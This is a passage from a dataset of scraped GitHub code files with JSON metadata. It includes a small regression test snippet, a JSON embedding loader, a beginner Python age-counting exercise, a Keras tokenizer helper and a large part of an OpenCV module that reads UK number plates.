model.forward(test_x)\n loss = model.cross_entropy_function(y,test_y)\n accuracy = model.accuracy(y,test_y)\n print(\"Test | Data Size:{1} | Loss:{2:.3f} | Accuracy:{3:.2f}\".format(len(test_y),loss,accuracy))\n","repo_name":"RyosukeOzaki/Logistic-Regression-binary-","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35668053196","text":"\"\"\"Utility Class for reading and writing input output\"\"\"\nimport json\n\n\nclass IOUtil:\n\n @staticmethod\n def read_index_vector_json(file_path):\n with open(file_path, 'r') as json_file:\n input_file = json.load(json_file)\n label_list = [entry['label'] for entry in input_file['keys']]\n vector_list = [entry['embedding'] for entry in input_file['keys']]\n index2label = {index: label for index, label in enumerate(label_list)}\n vec_dim = len(vector_list[0])\n return vec_dim, index2label, vector_list\n","repo_name":"atulathome/similarity-search-service","sub_path":"src/util/io_util.py","file_name":"io_util.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4561003485","text":"from datetime import date\r\natual = date.today().year\r\ntotmaior = 0\r\ntotmenor = 0\r\nfor c in range(1,8):\r\n ano = int(input('Digite seu ano de nascimento:'))\r\n idade = atual - ano\r\n print('Sua idade é {}'.format(idade))\r\n if idade >= 21:\r\n totmaior = totmaior + 1\r\n else:\r\n totmenor =+ 1\r\nprint('O número de pessoas maior de idade foi de {} e o número de pessoas menores \\n de idade foram {}'.format(totmaior, totmenor))\r\nprint('Obrigada pela presença!')\r\n","repo_name":"talitaruiz/Python-Files","sub_path":"Ex054_Maioridade.py","file_name":"Ex054_Maioridade.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18825602731","text":"from keras_preprocessing.sequence import pad_sequences\r\nfrom keras_preprocessing.text import Tokenizer\r\n\r\nfrom ML_Pipeline.Constants import max_text_length, vocab_size, model_dir\r\nfrom ML_Pipeline.utils import save_tokenizer\r\n\r\noov_token = \"\"\r\npadding_type = \"post\"\r\ntrunction_type=\"post\"\r\n\r\ndef build_tokenizer(df_train,num_words=None):\r\n if num_words is None:\r\n tokenizer = Tokenizer(oov_token=oov_token)\r\n else:\r\n tokenizer = Tokenizer(oov_token=oov_token,num_words=vocab_size)\r\n\r\n tokenizer.fit_on_texts(df_train)\r\n word_index = tokenizer.word_index\r\n print(\" Word Index length \", len(word_index))\r\n print(\" Number of Words: \", tokenizer.num_words)\r\n save_tokenizer(tokenizer,num_words)\r\n return tokenizer\r\n\r\ndef prepare_seqence_data(text,tokenizer):\r\n\r\n print(text.head(2))\r\n # Create Sequence\r\n print(\" Create Sequence \")\r\n text_sequences = tokenizer.texts_to_sequences(text)\r\n\r\n # Missing words in Glove vectors\r\n #words_used = [tokenizer.index_word[i] for i in range(1, vocab_size)]\r\n #missing_words = set(words_used) - set(word_vec.index.values)\r\n #print(len(missing_words))\r\n #missing_word_index = [tokenizer.word_index[word] for word in missing_words]\r\n\r\n\r\n # Pad the Sequences, because the sequences are not of the same length,\r\n # so let’s pad them to make them of similar length\r\n text_padded = pad_sequences(text_sequences, maxlen=max_text_length, padding=padding_type,\r\n truncating=trunction_type)\r\n\r\n # test_text_padded = pad_sequences(test_text_sequences, maxlen=max_text_length, padding=padding_type,\r\n # truncating=trunction_type)\r\n\r\n print(\"Padded Sequence :: \", text_padded[0:5])\r\n\r\n return text_padded\r\n\r\n\r\n","repo_name":"ykmanoj/sequence_classification_news","sub_path":"src/nlp/text_tokenize.py","file_name":"text_tokenize.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73001476907","text":"# UKRegOCR.py\r\n# SJM / MCL 2018 www.marvellconsultants.com\r\n#\r\n# Import this as a module for access to:\r\n# ReadPlate(img, target_size, plateXYWH)\r\n# lookForPlate(img, target_size) and\r\n# WhtOrYel(img, AOI)\r\n# To run as a script, please provide an image file name on the command line, results will be printed to stdout\r\n# See PDF documentaion for mode details\r\n\r\n# Dependencies:\r\n# Python 3.x with openCV (cv2) & numpy librarys\r\n# Plus:\r\n# OCRFonts module (OCRFonts.py)\r\n# UKPlates66x20P.xml and\r\n# UKChars33_16x25_11W.xml haar-cascade classifier files\r\n# - All in the same directory as UKRegOCR.py.\r\n\r\n# target_size:\r\n# Tuple TgtWH should approximate the nominal, mid-field size in pixels (W,H) of a UK number plate\r\n# as seen by by your camera. The plate should be roughly horizontal and reasonably un-distorted,\r\n# the reader can handle only ~10 degrees max of rotation and skew.\r\n# Pre-process your images with one of openCV's afine transforms if necessary.\r\n# Note that a plate height of 50 pixels corresponds to a character height of about 33 pixels, the reader\r\n# works ok down to a character-height of around 25 pixels in good quality, sharp images, less well below that.\r\n# If characters are much bigger then processing speed will start to suffer.\r\n\r\n# Change Log:\r\n# 01/10/18 First public release\r\n\r\n# To Do:\r\n# Leading zero disqualification in all but @@##@@@ format plates\r\n# Use logging module for debug o/ps\r\n# Re-visit initial crop after intial character-classifier detection?\r\n# Re-visit rotation after initial XC?\r\n\r\nimport math, time, pprint\r\nimport cv2\r\nimport numpy as np\r\nimport OCRFonts\r\n\r\n# Module globals\r\nDEBUG = False # set True to print verbose debug info\r\nASPECT = 0.625 # nominal aspect ratio of non-I characters as seen in centre-field, width/height\r\nASPI = 0.23 # relative width of the I char cf all other chars\r\nPH2TH = 1.57 # approx text height cf lookForPlate()-detected plate height (varies 1.2 .. 1.8)\r\nPW2CH = 6 # approx UKPlate text-span-width from observed naked character height\r\nSTW2TW = 8.3 # approx UKPlate string width from naked-text-width, use this when we have a better handle on tw\r\nCAS_OVER = 0.91 # correction for CharCas's over-estimate of char height (about 10%)\r\n\r\nPLCAS = cv2.CascadeClassifier('UKPlates66x20P.xml') # SJM's default cascade plate classifier P=conservative\r\nCHCAS = cv2.CascadeClassifier('UKChars33_16x25_11W.xml') # SJM's favorite character spotter\r\n\r\n# Templates for all valid UK plate formats, with corresponding arbitrary likelyhood scores.\r\n# Scores should be in the range 0..25. # for a number, @ for an alpha. lowest scores first.\r\nPlateLUT = {'#@':0,'@#':0,\r\n '##@':1,'@##':1,'#@@':1,'@@#':1,\r\n '@###':2,'###@':2,\r\n '@@##':3,'##@@':3,\r\n '@@@#':4,\r\n '####@':5,'@####':5,\r\n '@@###':6,'###@@':6,\r\n '@@@##':7,\r\n '@@@#@':9,'@#@@@':9,'@@####':9,'####@@':9,\r\n '@@@###':11,\r\n '@@@##@':13,'@##@@@':13,\r\n '@@@####':17,\r\n '@@@###@':20,'@###@@@':20,\r\n '@@##@@@':24}\r\n\r\n# ----------------- public functions ----------------------\r\n\r\n# Look for a target number-plate in the image using HaarCascade classifier\r\n# Return object geometry as (X,Y,W,H) tuple if found, else return (0,0,0,0).\r\n# Use an itterative approach with varying sensitivity parameters to try to obtain exactly one hit\r\n# If that's not possible return just the first hit.\r\ndef lookForPlate(img, TargetWH=(170,50), xml=None):\r\n pltCas = PLCAS\r\n if xml is not None:\r\n try: # attempt top load the specified cascade xml file\r\n pltCas = cv2.CascadeClassifier(xml)\r\n except:\r\n return [0,0,0,0] # no xml file\r\n # Start working at the most sensitive level (z=0), if there's no recognition here then we're done.\r\n z = 0 # sensitivity factor; must start at zero (most sensitive) for no-hit logic to work\r\n ll, ul = 0, 99\r\n pls0 = [0,0,0,0]\r\n while True:\r\n Tmin = (int(TargetWH[0] * 0.5), int(TargetWH[1] * 0.5))\r\n Tmax = (Tmin[0] * 3, Tmin[1] * 3)\r\n pls = pltCas.detectMultiScale(img, 1.1+(z/300), z+6, 0, Tmin, Tmax)\r\n c = len(pls)\r\n if c == 1: return pls[0] # one plate, job done.\r\n if c == 0:\r\n if z == 0: return pls0 # no plate\r\n ul = z\r\n z = (ll + z)//2\r\n if z == ll: break # out of options\r\n else:\r\n pls0 = pls[0] # keep this option up our sleave\r\n ll = z\r\n z = (z + ul)//2\r\n if z == ll: break # out of options\r\n # >1 result, carry on slowly increasing Z without limit until 1 or no results\r\n while True:\r\n z = max(z+1, z*1.05)\r\n pls = pltCas.detectMultiScale(img, 1.1+(z/150), int(z), 0, Tmin, Tmax)\r\n c = len(pls)\r\n if c == 1: return pls[0]\r\n if c == 0: break\r\n return pls0\r\n\r\n# Analyse the average colour within the optionally specified crop window for whiteness or yellowness\r\n# Crop process is tolerant of -ve X / Y and also X > W / Y > H\r\n# Assumes img is a 3-plane BGR colour image\r\n# Warning: contrast stretching may distort plate colour, don't us it prior to calling this.\r\ndef WhtOrYel(in_img, crop = (0,0,0,0)):\r\n # crop?\r\n if (crop[2] > 0) and (crop[3] > 0):\r\n H = len(in_img)\r\n W = len(in_img[0])\r\n (Y0,Y1,X0,X1) = (crop[1], crop[1] + crop[3], crop[0], crop[0] + crop[2])\r\n Y0 = min(max(Y0, 0), H-1)\r\n Y1 = min(max(Y1, 0), H-1)\r\n X0 = min(max(X0, 0), W-1)\r\n X1 = min(max(X1, 0), W-1)\r\n img = in_img[Y0:Y1, X0:X1] # crop\r\n H = len(img)\r\n W = len(img[0])\r\n bgr_planes = cv2.split(img)\r\n if len(bgr_planes) < 3: return '-' # bad crop/image\r\n b = r = 0\r\n Ag = np.median(bgr_planes[1])\r\n for y in range(0, H):\r\n for x in range(0, W):\r\n if bgr_planes[1][y][x] >= Ag:\r\n b += bgr_planes[0][y][x]\r\n r += bgr_planes[2][y][x]\r\n if (r == b): return '-' # monochrome image\r\n # colour test\r\n if r == 0: return '-'\t# blank image?\r\n x = b / r\r\n # print('{:0.2f}'.format(x), end = '')\r\n if x < 0.9: return 'Y'\r\n if x > 0.9: return 'W'\r\n return '-' # in dead-band\r\n\r\n# Master plate-read algorithm ------------------\r\n#\r\n# If you have already run the lookForPlate() function on the image and have an (XYWH) tuple\r\n# you can supply this to UKRegOCR() to skip the initial classifer stage and save some CPU time.\r\n#\r\n# convert source image to grey-scale if necessary\r\n# identify approx plate position using haar-cascades\r\n# return error if no plate\r\n# crop to plate AOI\r\n# detect and compensate for white-on-black style plates\r\n# horizontalise the crop\r\n# de-skew characters\r\n# estimate character size\r\n# OCR (template-match) all non-I characters, with itterative char-size optimisation\r\n# OCR for I characters\r\n# reject mis-aligned or badly positioned characters \r\n# derive an arbitrary confidence level\r\n# determine plate b/g colour\r\n#\r\n# Return ('reg', confidence%, (plate-location), 'plate_colour') or '!error_msg'\r\n# as: ( string, 0..99, (X,Y,W,H), ['W'|'Y'|'B'|'-'] )\r\n# or: string\r\n#\r\ndef ReadPlate(in_img, TargetWH=(170,50), plateXYWH=None):\r\n\r\n # -------------------------- local misc support functions -----------------------\r\n\r\n # Enlarge W & H of a crop geometry w/ approp adj of X & Y, width*2 & height*1.66\r\n def enlargeCrop(xywh):\r\n W = int(xywh[2] * 2)\r\n H = int(xywh[3] * 1.66)\r\n X = xywh[0] - (W - xywh[2])//2\r\n Y = xywh[1] - (H - xywh[3])//2\r\n if X < 0: X = 0\r\n if Y < 0: Y = 0\r\n return (X,Y,W,H)\r\n\r\n # Crop an image to the specified XYWH rectangle\r\n # NOTE if X0,Y0 or X1,Y1 exceed the image boundry then a smaller than expected image will be returned.\r\n # ASSUMES img is monochrome\r\n def cropIt(img, crop):\r\n ih, iw = img.shape\r\n X0,Y0,X1,Y1 = crop[0], crop[1], crop[0] + crop[2], crop[1] + crop[3]\r\n return img[Y0:Y1, X0:X1]\r\n\r\n # measure the 'morf' image's central block height\r\n # return the height and a centre-line estimate\r\n def measureTxH(img, xl, xr):\r\n xpcs = ()\r\n for i in range(0,10):\r\n xpcs += (int(xl + ((xr - xl) * (i + 0.5) / 10)) ,)\r\n ih = len(img)\r\n iw = len(img[0])\r\n yc = n = 0\r\n Hs = ()\r\n for xs in xpcs:\r\n if (xs < 0) or (xs >= iw): continue\r\n # search up from center-line...\r\n yt = yb = int(ih/2)\r\n while yt > 0:\r\n if img[yt][xs] == 0: break\r\n yt -= 1\r\n # search down...\r\n while yb < ih:\r\n if img[yb][xs] == 0: break\r\n yb += 1\r\n h = yb - yt\r\n if h > 2:\r\n Hs += (h, )\r\n yc += yb + yt\r\n n += 1\r\n avH = sjmAvg(Hs)\r\n if n > 0: ycl = yc / (2 * n)\r\n else: ycl = ih/3\r\n return int(avH-0.5), int(ycl)\r\n\r\n # Generate a simple linear equalising LUT from the supplied histogram\r\n # With hard coded 5% clip limits\r\n def heq(hist):\r\n LUT = np.zeros(256)\r\n bp = 0\r\n tp = 255\r\n t = 0\r\n th = np.sum(hist) * 0.05\r\n if th >= 1:\r\n #find bottom 5 percentile point bp\r\n while True:\r\n t += hist[bp]\r\n if t > th: break\r\n bp += 1\r\n #find top 5 percentile point\r\n t = 0\r\n while True:\r\n t += hist[tp]\r\n if t > th: break\r\n tp -= 1\r\n # build lut\r\n r = 255 / (tp - bp)\r\n for i in range(bp,256): LUT[i] = min(255, int(r * (i - bp)))\r\n return LUT\r\n\r\n # Calculate a modified average for a list of austensibly +ve numbers by rejecting -ves & any outliers \r\n # Delete no more than n/3 outliers, while aiming for a std of < 3\r\n def sjmAvg(in_lst):\r\n n = len(in_lst)\r\n if n == 0: return 0\r\n lst = in_lst\r\n s = np.std(lst)\r\n a = np.average(lst)\r\n if (s < 3) and (min(lst) >= 0): return a\r\n while (len(lst) > n * .66) and (len(lst) > 3) and (s > 3):\r\n newlst = ()\r\n for i in range(0, len(lst)):\r\n if (lst[i] >= 0) and (abs(lst[i] - a) < s): newlst += (lst[i],)\r\n lst = newlst\r\n if len(lst) > 0:\r\n s = np.std(lst)\r\n a = np.average(lst)\r\n return a\r\n\r\n # Calculate a modified average for a list of numbers by rejecting outliers \r\n # Delete no more than n/3 outliers, while aiming for a std of < minSD\r\n def sjmAvg2(in_lst, minSD):\r\n n = len(in_lst)\r\n if n == 0: return 0\r\n lst = in_lst\r\n s = np.std(lst)\r\n a = np.average(lst)\r\n while (len(lst) > n * .66) and (len(lst) > 3) and (s > minSD):\r\n newlst = ()\r\n for i in range(0, len(lst)):\r\n if abs(lst[i] - a) < s: newlst += (lst[i],)\r\n lst = newlst\r\n s = np.std(lst)\r\n a = np.average(lst) \r\n return a\r\n\r\n # If the majority of entries agree, dis-regard all others\r\n # otherwise just take the average\r\n def votedAverage(lst):\r\n av = np.average(lst)\r\n if len(lst) < 3: return av \r\n Bins,Bounds = np.histogram(lst, 20, [-10, 10])\r\n for i in range(0, len(Bins)):\r\n if Bins[i] > len(lst) / 2: return Bounds[i]\r\n return av\r\n\r\n # Nonify outliers from a list (NOT TUPLE) of numbers, by replacing bad numbers with None\r\n # Edit the supplied list in-place, keep removing out-liers until the Coefficient of Variance\r\n # of the remaining set falls below the specified maxCV\r\n # Return number-of-remainers, average, median and CV of remaining set\r\n # Used by the cascade character spotter\r\n def rejectOutliers(in_lst, maxCV):\r\n a = worst = -1\r\n s = 1\r\n while True:\r\n lst = ()\r\n for i in in_lst:\r\n if i is not None: lst += (i,)\r\n s = max(1, np.std(lst))\r\n a = np.average(lst)\r\n m = np.median(lst)\r\n cv = s / max(1, abs(a))\r\n if cv < maxCV: break\r\n if len(lst) < 3: break\r\n #print(a,m,s,cv)\r\n worst = worstn = None\r\n for i in range(0, len(in_lst)):\r\n if in_lst[i] is not None:\r\n dev = abs(in_lst[i] - a)\r\n if (worst is None) or (dev > worst):\r\n worst = dev\r\n worstn = i\r\n in_lst[worstn] = None\r\n return (len(lst), a, m, cv) \r\n\r\n # Look for UKFont character shapes using SJM's best Haar-cascade classifier\r\n # Don't return > 7 char locations\r\n # Reject any dodgey looking shapes with no real contrast\r\n def seekChrs(img, TxWH):\r\n Cas = CHCAS\r\n z = 1\r\n Tmin = (int(TxWH[0] * 0.5), int(TxWH[1] * 0.5))\r\n Tmax = (Tmin[0] * 3, Tmin[1] * 3)\r\n while True:\r\n z = int(z * 1.2 + 1)\r\n chs = Cas.detectMultiScale(img, 1.01 + (z/200) , z, 0, Tmin, Tmax)\r\n if len(chs) < 8: break\r\n if len(chs) == 0: return [],-1\r\n # from the chs tuple build a list or rects and a list of areas\r\n # in prep for rejecting area and centre-line out-liers\r\n cList = list(range(0,len(chs)))\r\n chsA = cList.copy()\r\n for n in range(0, len(chs)):\r\n ch = chs[n]\r\n cList[n] = ch\r\n chsA[n] = ch[2] * ch[3]\r\n # Reject area out-liers\r\n N,Aav,Amd,Acv = rejectOutliers(chsA, 0.1) # until Coef of Variance < 0.1\r\n # reject phantom spots with little or no contrast in the original img\r\n for n in range(0, len(chsA)):\r\n if chsA[n] is not None:\r\n (x,y,w,h) = (cList[n][0],cList[n][1],cList[n][2],cList[n][3])\r\n chsA[n] = np.std(img[y:y+h, x:x+w]) # we use std dev as a proxy for contrast\r\n N,av,md,cv = rejectOutliers(chsA, 0.2)\r\n # Reject Yc out-liers\r\n for n in range(0, len(chsA)):\r\n if chsA[n] is not None: chsA[n] = cList[n][1] + (cList[n][3] / 2) # centre y co-ord\r\n N,Yav,Ymd,Ycv = rejectOutliers(chsA, 0.1)\r\n # edit cList to reflect current state of chsA 'None's\r\n for i in range(len(chsA)-1 , -1, -1):\r\n if chsA[i] is None: cList = np.delete(cList, i, axis=0)\r\n return cList, Yav\r\n\r\n # Given a map of values find the local peaks over the specified sampling window\r\n # return a list of (X,Y,val) tuples\r\n def findLocalPeaks(map, gw):\r\n result = []\r\n gx = gw - (1 - (gw % 2)) # force grid width to an odd no.\r\n gbx2 = int(gx/2)\r\n H = len(map)\r\n W = len(map[0])\r\n Xxcs = np.zeros(W)\r\n Xys = np.zeros(W)\r\n Xnzav = np.zeros(W)\r\n for x in range(0, W):\r\n n = 0\r\n for y in range(0, H):\r\n if map[y,x] > 0:\r\n Xnzav[x] += map[y,x]\r\n n += 1\r\n if map[y,x] > Xxcs[x]:\r\n Xxcs[x] = map[y,x]\r\n Xys[x] = y\r\n if n > 0: Xnzav[x] = (Xnzav[x] - Xxcs[x]) / max(1, n)\r\n if Xxcs[x] < Xnzav[x] * 1.14: Xxcs[x] = 0\r\n for x in range(gbx2, W-gbx2):\r\n tst = Xxcs[x-gbx2:x+gbx2+1].copy()\r\n mx = np.max(tst)\r\n if mx < 0.25: continue\r\n if tst[gbx2] != mx: continue\r\n # AND UNIQUE PK, all other points must be < mx\r\n tst[gbx2] = 0\r\n if mx == np.max(tst): continue\r\n # and must be sig > average of all other nz points in the central column\r\n if mx < 1.14 * np.sum(tst) / (1 + cv2.countNonZero(tst)): continue\r\n result.append((x, int(Xys[x]), mx))\r\n return result\r\n\r\n # If lh & rh end chars are > maxX apart then cull the weaker one\r\n # del item(s) in regData accordingly\r\n # Return true if any deletions made, to allow for itteration\r\n def delOOBChars(regData, pw, avW, wdthI):\r\n Xlist = sorted(regData)\r\n lhi = 0\r\n rhi = len(regData) - 1\r\n if rhi <= lhi: return False\r\n xl,xr = Xlist[lhi], Xlist[rhi]\r\n wl = avW/2\r\n if regData[xl][0] == 'I': wl = wdthI/2\r\n wr = avW/2\r\n if regData[xr][0] == 'I': wr = wdthI/2\r\n if (xr-wr) - (xl+wl) <= pw: return False\r\n if regData[xr][2] > regData[xl][2]:\r\n #print('ODel', xl, regData[xl])\r\n del(regData[xl])\r\n return True\r\n if regData[xr][2] < regData[xl][2]:\r\n #print('ODel', xr, regData[xr])\r\n del(regData[xr])\r\n return True\r\n del(regData[xl])\r\n del(regData[xr])\r\n return True\r\n\r\n # If the weakest XC in the list is < thr * average of the rest delete it.\r\n # Return true if any regData item has been removed, to allow for itteration\r\n # We first build a weakness score based on: low xc, poor Y alignment and\r\n # excessive inter-char gaps at the ends of the string\r\n def rejectWeaklings(regData, thr):\r\n if len(regData) < 3: return False\r\n Xlist = sorted(regData)\r\n gaplst = ()\r\n XClist = []\r\n prevX = None\r\n for x in Xlist:\r\n XClist += [regData[x][2]]\r\n if prevX is not None: gaplst += (x-prevX, )\r\n prevX = x\r\n avgap = sjmAvg(gaplst)\r\n rating = ()\r\n for i in range(0, len(Xlist)):\r\n x = Xlist[i]\r\n if len(regData[x]) > 3:\r\n ch,y,xc,dy = regData[x]\r\n else:\r\n ch,y,xc = regData[x]\r\n dy = 0\r\n g = 0\r\n if (i == 0):\r\n g = Xlist[1] - x\r\n if (i == len(Xlist) - 1):\r\n g = x - Xlist[-2]\r\n # if the leading / trailing char is I be more draconian...\r\n if (g > 0) and (ch == 'I'): g /= math.pow(xc, 2.5)\r\n if g > avgap:\r\n g -= avgap\r\n g *= 4 / avgap\r\n else: g = 0\r\n # calculate average XC but WITHOUT this current entry\r\n XClistNaN = XClist.copy()\r\n XClistNaN[i] = np.NaN\r\n axc = np.nanmean(XClistNaN)\r\n dxc = max(0, axc*axc - xc*xc) * 18\r\n q = 2*dy + dxc + g\r\n rating += (q, )\r\n wq = max(rating)\r\n if wq > thr:\r\n for i in range(0, len(Xlist)):\r\n if wq == rating[i]:\r\n del(regData[Xlist[i]])\r\n return True\r\n return False\r\n\r\n def gap2BestFit(xref, regData):\r\n Xlist = sorted(regData)\r\n # Pre-load the Xlist with duplicate entries - more duplicates for higher xcs\r\n del(Xlist[Xlist.index(xref)]) # but remove the specified entry\r\n x = Xlist.copy()\r\n for i in Xlist:\r\n xc = regData[i][2]\r\n nd = int(math.pow(2, max(0, (xc * xc * 12) - 3))) # 0.9 => +32 dups ... 0.65 => +2 dup\r\n if nd > 1:\r\n for n in range(1,nd): x.append(i)\r\n # Linear regression analysis on the augmented list\r\n y = [regData[i][1] for i in x]\r\n x_mean, y_mean = np.mean(x), np.mean(y)\r\n covar = 0.0\r\n for i in range(len(x)): covar += (x[i] - x_mean) * (y[i] - y_mean)\r\n b1 = covar / max(1, sum([(p - x_mean)**2 for p in x]))\r\n b0 = y_mean - b1 * x_mean\r\n dy = abs(regData[xref][1] - (b1 * xref + b0))\r\n return dy\r\n\r\n # Force a set of XY points to fit a straight line to within the specified coef-of-variance\r\n # Progressively delete poorest entries in regData until variance acheived\r\n # Augment each regData entry with it's dy error distance (in pixels) in index[3]\r\n # Return an estimated y centre-line and the max deviation from it\r\n def forceFit(regData, vmax):\r\n v = vmax+1\r\n while v > vmax:\r\n Xlist = sorted(regData)\r\n XYset = [[x, regData[x][1]] for x in Xlist] # list of X,Y pairs for later\r\n # now reject the points that fit most poorly to the best straight line through the OTHER points\r\n worst = 0\r\n wi = 0\r\n i = 0\r\n rslt = []\r\n for x,y in XYset:\r\n dy = gap2BestFit(x, regData) # y gap to the best-fit line WITHOUT the current x point\r\n if dy > worst:\r\n worst = dy\r\n wi = len(rslt)\r\n rslt.append(dy)\r\n if len(regData[x]) < 4: regData[x].append(dy)\r\n else: regData[x][3] = dy\r\n v = np.var(rslt)\r\n if v > vmax:\r\n #print('FDel', Xlist[wi], regData[Xlist[wi]])\r\n del(regData[Xlist[wi]])\r\n # re-calc mean\r\n y_mean = 0\r\n for x in regData: y_mean += regData[x][1]\r\n y_mean /= len(regData)\r\n # want to return the max deviation from the int(y_mean)\r\n ycl = int(y_mean + 0.5)\r\n dy = ()\r\n for x in regData: dy += (abs(ycl - regData[x][1]), )\r\n return max(dy), ycl\r\n\r\n # Return index (x value) of nearest chars both left and right of target\r\n def nearestValids(x, regData):\r\n if x in regData: return (x,x)\r\n xs = sorted(regData) # smallest first\r\n if len(xs) == 0: return(None, None)\r\n if x < xs[0]: return (None, xs[0])\r\n if x > xs[-1]: return (xs[-1], None)\r\n for i in range(1, len(xs)):\r\n if (x < xs[i]) : break\r\n return (xs[i-1], xs[i])\r\n\r\n # Trim away blank (white) borders from an image\r\n # assumes at least one black pixel exists in image\r\n # and that the image has non-black borders on all 4 edges\r\n def trimImage(im):\r\n Hmins = np.amin(im, axis = 0) # list of min values in each V column\r\n # we can discard any left/right hand image colums that are nz in Hmins\r\n lhs = 0\r\n while Hmins[lhs] > 127: lhs += 1\r\n rhs = lhs\r\n while Hmins[rhs] < 128: rhs += 1\r\n Vmins = np.amin(im, axis = 1)\r\n # we can discard any top/bottom image rows that are nz in Vmins\r\n top = 0\r\n while Vmins[top] > 127: top += 1\r\n bot = top\r\n while Vmins[bot] < 128: bot += 1\r\n return im[top:bot, lhs:rhs]\r\n\r\n # Return a char template image to the specified char height & width to include extra\r\n # one or two pixel H & V borders so as to force an odd H & V pixel size as required by template matcher\r\n def makeCharTmplt(c, th, tw):\r\n im = cv2.resize(np.array(OCRFonts.UKFont[c], dtype=np.uint8), (tw, th), interpolation=cv2.INTER_CUBIC)\r\n # Add borders post-scale and force an odd-number of pixels in both H & V\r\n iw = tw + 6 - (1 - (tw % 2))\r\n ih = th + 6 - (1 - (th % 2))\r\n tmplt = np.ones((ih,iw), dtype=np.uint8)\r\n tmplt *= 255\r\n tmplt[2:th+2, 2:tw+2] = im\r\n return tmplt\r\n\r\n # Template-matches (XC) the img with character-templates from chlst made to the specified size (th,tw)\r\n # returns the average of the top n peaks found in the resulting xcmap\r\n # along with a dictionary of XC peak values indexed by character (from chlst)\r\n def preScan(img, AOI, chlst, th, tw, n, pw, chwI):\r\n xcmap = np.zeros(img.shape)\r\n chmap = np.zeros(img.shape, dtype=str)\r\n charMaxXC = {}\r\n x0,y0,x1,y1 = AOI\r\n subimg = img[y0:y1, x0:x1]\r\n if len(subimg) < 10: return 0,0,0,0,{},(),{}\r\n for c in chlst:\r\n tmplt = makeCharTmplt(c, th, tw) # tmplt will have guaranteed odd-numbered H & W pixel counts\r\n # make sure template is smaller (less high in y) than AOI\r\n while len(tmplt) >= len(subimg): tmplt = tmplt[1:-1]\r\n xo = x0 + len(tmplt[0]) // 2\r\n yo = y0 + len(tmplt) // 2\r\n xco = cv2.matchTemplate(subimg, tmplt, cv2.TM_CCOEFF_NORMED)\r\n charMaxXC[c] = np.amax(xco)\r\n #if DEBUG and (c == '3'):\r\n # print(charMaxXC[c])\r\n # cv2.imshow('xc_debug', xco)\r\n # cv2.imshow('tmp_debug', tmplt)\r\n if charMaxXC[c] > 0.33:\r\n for x in range(0, len(xco[0])):\r\n for y in range(0, len(xco)):\r\n if xcmap[y+yo,x+xo] < xco[y,x]:\r\n xcmap[y+yo,x+xo] = xco[y,x]\r\n chmap[y+yo,x+xo] = c\r\n # find the peaks\r\n ppoints = findLocalPeaks(xcmap, tw * 1.1)\r\n if len(ppoints) == 0: return 0,0,0,0,{},(),{}\r\n # calc average xc of the top n peaks (n as specified)\r\n xcc = ()\r\n for x,y,xc in ppoints: xcc += (xc, )\r\n if len(xcc) > n:\r\n bxc = np.average(sorted(xcc, reverse = True)[0:n])\r\n else:\r\n bxc = np.average(xcc)\r\n # from ppoints make regdata\r\n regData = {}\r\n prevX = None\r\n for x,y,xc in ppoints:\r\n ch = chmap[y,x]\r\n if prevX is not None:\r\n # check for overlapping chars\r\n if x - prevX < tw + 1:\r\n # a conflict, pick only the strongest\r\n if xc < regData[prevX][2]: continue\r\n del(regData[prevX])\r\n regData[x] = [ch, y , xc]\r\n prevX = x\r\n # Reject any edge chars that are > max possible inter-char-gap pixels apart\r\n while delOOBChars(regData, pw, tw, chwI): pass\r\n # Reject the worst Y co-ordinate out-liers\r\n dy,yc = forceFit(regData, 0.66)\r\n return bxc, dy, yc, len(tmplt), charMaxXC, ppoints, regData\r\n\r\n # Run a simplified XC scan for I characters\r\n # we only scan along the yc centre-line\r\n def IScan(img, yc, tw, th):\r\n xcmap = np.zeros(img.shape)\r\n charMaxXC = {}\r\n tmplt = makeCharTmplt('I', th, tw) # tmplt will have guaranteed odd-numbered H & W pixel counts\r\n xo = len(tmplt[0]) // 2\r\n tmh = len(tmplt) // 2\r\n # make sure template is smaller (less high in y) than AOI\r\n im = img[(yc-1-tmh):(yc+2+tmh), 0:-1]\r\n if len(im) < 10: return ()\r\n while len(tmplt) >= len(im): tmplt = tmplt[1:-1]\r\n xco = cv2.matchTemplate(im, tmplt, cv2.TM_CCOEFF_NORMED)\r\n for x in range(0, len(xco[0])): xcmap[yc,x+xo] = max(xco[:,x])\r\n # find the peaks\r\n ppoints = findLocalPeaks(xcmap, tw * 1.1)\r\n if len(ppoints) == 0: return ()\r\n return ppoints\r\n\r\n # next integer in sequence 0,+1,+2,+3.. or -1,-2,-3..\r\n def nextUD(d):\r\n if d < 0: d -= 1\r\n else: d += 1\r\n return d\r\n\r\n # Rule-of-thumb conversion from a pre-scan bxc to a limit on character list length\r\n # roughly xcs < .8 do not limit character list thro to xc = 1: limit of top 8 chars\r\n def XC2N(xc):\r\n if xc < 0.8: return None\r\n return 8 + int((125 * (1 - xc)))\r\n\r\n # Derive a new (hopefully reduced) AOI from the latest set of ppoints XC peaks\r\n def AOIfromPks(iw, ih, tw, ppks, bxc, tph, dy, yc):\r\n xmin = None\r\n xmax = None\r\n for x,y,xc in ppks:\r\n if xc > 0.6 * bxc:\r\n if xmin is None: xmin = x # the first sig pk\r\n xmax = x # the last sig pk\r\n if xmin is None: xmin = 0\r\n if xmax is None: xmax = iw\r\n AOI[0] = max(0, xmin - tw)\r\n AOI[2] = min(iw-1, xmax + tw)\r\n AOI[1] = max(0, int(yc - 2*dy - (tph//2) + 2))\r\n AOI[3] = min(ih-1, int(yc + 2*dy + (tph//2) + 2))\r\n return AOI\r\n\r\n # Merge a post-optimisation rd with a master regData\r\n # Not for use with I chars\r\n def regMerge(regData, rd, tw):\r\n #rprint(regData)\r\n #rprint(rd)\r\n # Augment regData with rd data, resolving any conflicts by rejecting the weaker char\r\n for x in rd:\r\n if x in regData:\r\n if rd[x][2] > regData[x][2]: regData[x] = rd[x]\r\n continue\r\n (xxl,xxr) = nearestValids(x, regData)\r\n xxcl = xxcr = 0\r\n if xxl is not None:\r\n if x - xxl <= tw + 